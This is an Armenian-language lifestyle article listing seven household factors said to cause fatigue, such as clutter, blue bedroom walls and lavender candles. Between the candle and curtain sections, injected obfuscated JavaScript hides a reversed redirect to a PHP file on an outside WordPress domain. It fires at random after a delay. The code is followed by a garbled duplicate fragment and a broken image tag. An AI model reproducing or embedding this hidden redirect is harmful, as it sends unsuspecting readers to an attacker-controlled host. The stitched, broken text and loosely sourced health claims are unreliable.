Տան 7 երևույթ, որոնք հոգնածություն են առաջացնում

Այս յոթ լիովին անվնաս և սովորական բաները ձեր տանը կարող են դառնալ քնի խանգարման և նույնիսկ քրոնիկական հոգնածության պատճառ:

Խառնաշփոթ

Տան խառնաշփոթը ձեր ուղեղը անընդհատ պահում է լարվածության մեջ: Եվ մշտական սթրեսը, նույնիսկ այդքան աննշանը, տանում է նյարդային սպառման և մշտապես հոգնածության զգացում է պատճառում: Որպեսզի շտկեք այդ իրավիճակը, խորհուրդ է տրվում շաբաթը մեկ օր նվիրել տան մաքրությանը․ դա կարող  լինել կիրակին։

Կապույտ պատեր

Տարօրինակ է հնչում, սակայն, ամերիկացի փորձագետների խոսքերով, ովքեր ուսումնասիրել են կապույտ գույնի ննջասենյակ ունեցող 2,000 տարբեր տներ, նշել են, որ այն հանգստացնող գույն է, որը կարող է դանդաղեցնել սրտի աշխատանքն ու ցածր ճնշման պատճառ հանդիսանալ: Այսպիսով, կապույտ ֆոնը ստիպում է ձեզ քնկոտ և թույլ զգալ օրվա ընթացքում, և դուք դա, նույնիսկ, կարող եք չնկատել։

Հեռուստացույց

Հեռուստացույցը, ավելի ճիշտ, դրա դիմաց քնելու սովորությունը օրվա մեջ մշտապես թուլության և քնկոտության զգացում կարող  է առաջացնել: Փաստն այն է, որ տեսանելի ճառագայթման կապույտ շրջանակը ճնշում է մադաթոնինի արտադրությանը, որը պատասխանատու է առողջ հոգնածության և քնի համար: Արդյունքում, երազը դառնում է փխրուն ու մակերեսային, որն էլ առավոտյան հոգնածության պատճառ է դառնում։

Բուրավետ մոմեր

Մի թերագնահատեք արոմաթերապիայի ազդեցությունը։ Օրինակ լավանդայի բույրով կամ այլ «հանգստացնող» բույրերով մոմերը կարող են օրվա մեջ քնկոտություն առաջացնել և հոգնածության զգացողության պատճառ դառնալ:

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-Make-Coffee-Scented-Candles.jpg” alt=”” width=”808″ height=”607″ />

Մշտապես փակված շերտավարագույրներ և վարագույրներ

Մթնոլորտը լավ քնի բարեկամն է: Բայց երեկոյան ժամը չորսին հոգնածությունից և քնկոտությունից խուսափելու համար բացեք վարագույրներն ու շերտավարագույները, որպեսզի բնական լույսը ներթափանցի տուն։

Չափազանց սառը սենյակ

Հայտնի է, որ սառը ցնցուղը թարմացնում է, սակայն սառը սենյակը, հակառակը, ստիպում է զգալ քնկոտություն  և հոգնածություն։ Այդ իսկ պատճառով, փորձեք սառը պահել միայն ննջասենյակը, այն էլ քնելուց մի քանի ժամ առաջ: